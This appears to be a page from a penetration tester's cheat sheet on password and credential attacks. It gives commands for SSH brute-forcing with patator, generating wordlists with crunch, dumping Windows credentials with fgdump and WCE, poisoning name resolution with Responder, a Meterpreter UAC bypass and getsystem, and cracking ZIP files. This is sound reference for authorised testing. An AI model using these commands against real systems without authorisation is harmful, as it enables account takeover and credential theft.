# Passwords & credentials

## Related

[Wordlists and dictionaries](https://d4rk1337.gitbook.io/the-pentesters-cheat-sheet/misc/wordlists-dictionaries)

## Online cracker

* [CrackStation](https://crackstation.net)
* [rumkin.com](http://rumkin.com/tools/cipher/)

## Online attacks

#### patator.py

Patator is a multi-purpose brute-forcer, with a modular design and a flexible usage.\
[GitHub - lanjelot/patator](https://github.com/lanjelot/patator)

```bash
python -W ignore patator.py ssh_login host=<ip> user=FILE0 0=/root/usernames password=Pass.txt
```

## Tools

* [Hashcat](https://d4rk1337.gitbook.io/the-pentesters-cheat-sheet/exploitation/passwords/01-hashcat)
* [John the Ripper (JTR)](https://d4rk1337.gitbook.io/the-pentesters-cheat-sheet/exploitation/passwords/02-john-the-ripper)

### identify hash

* [Hashes.com](https://hashes.com/en/tools/hash_identifier)

```bash
hashid <hash>
```

```bash
hash-identifier
```

## Key spaced brute force

### crunch

```bash
crunch 6 6 0123456789ABCDEF -o crunch1.txt
```

Pre-defined character set

```bash
crunch 4 4 -f /usr/share/crunch/charset.lst mixalpha
```

More customized passwords

```
@ - Lower case alpha characters
, - Upper case alpha characters
% - Numeric characters
^ - Special characters including space 
```

```bash
crunch 8 8 -t ,@@^^%%%
```

### fgdump

In memory attack (injecting dll), for system passwords

```bash
fgdump.exe
type 127.0.0.1.pwdump
```

Alternative: Pwdump

### Windows Credentials Editor (WCE)

> Windows Credentials Editor (WCE) is a security tool to list logon sessions and add, change, list and delete associated credentials (ex.: LM/NT hashes, plaintext passwords and Kerberos tickets).

[Download Site](https://www.ampliasecurity.com/research/windows-credentials-editor/)

List logon sessions

```bash
wce -l
```

Dump clear text passwords

```bash
wce -w
```

### responder.py (windows creds)

> Responder is a LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP\_SMB\_MSSQL\_FTP\_LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication.\
> [GitHub - lgandx/Responder](https://github.com/lgandx/Responder)

```bash
python ./Responder.py -i <own-ip> -b Off -r Off -w On
```

### bypassuac

Used to bypass UAC post exploitation <http://thehackerplaybook.com/Download/bypassuac.zip>

```
run bypassuac
background
session -i 2
getsystem
```

## Specific services, apps, files

### fcrackzip

> A braindead program for cracking encrypted ZIP archives. Forked from <http://oldhome.schmorp.de/marc/fcrackzip.html\\>
> [GitHub - hyc/fcrackzip](https://github.com/hyc/fcrackzip)

```bash
fcrackzip -u -D -p <file-with-pws> file.zip
```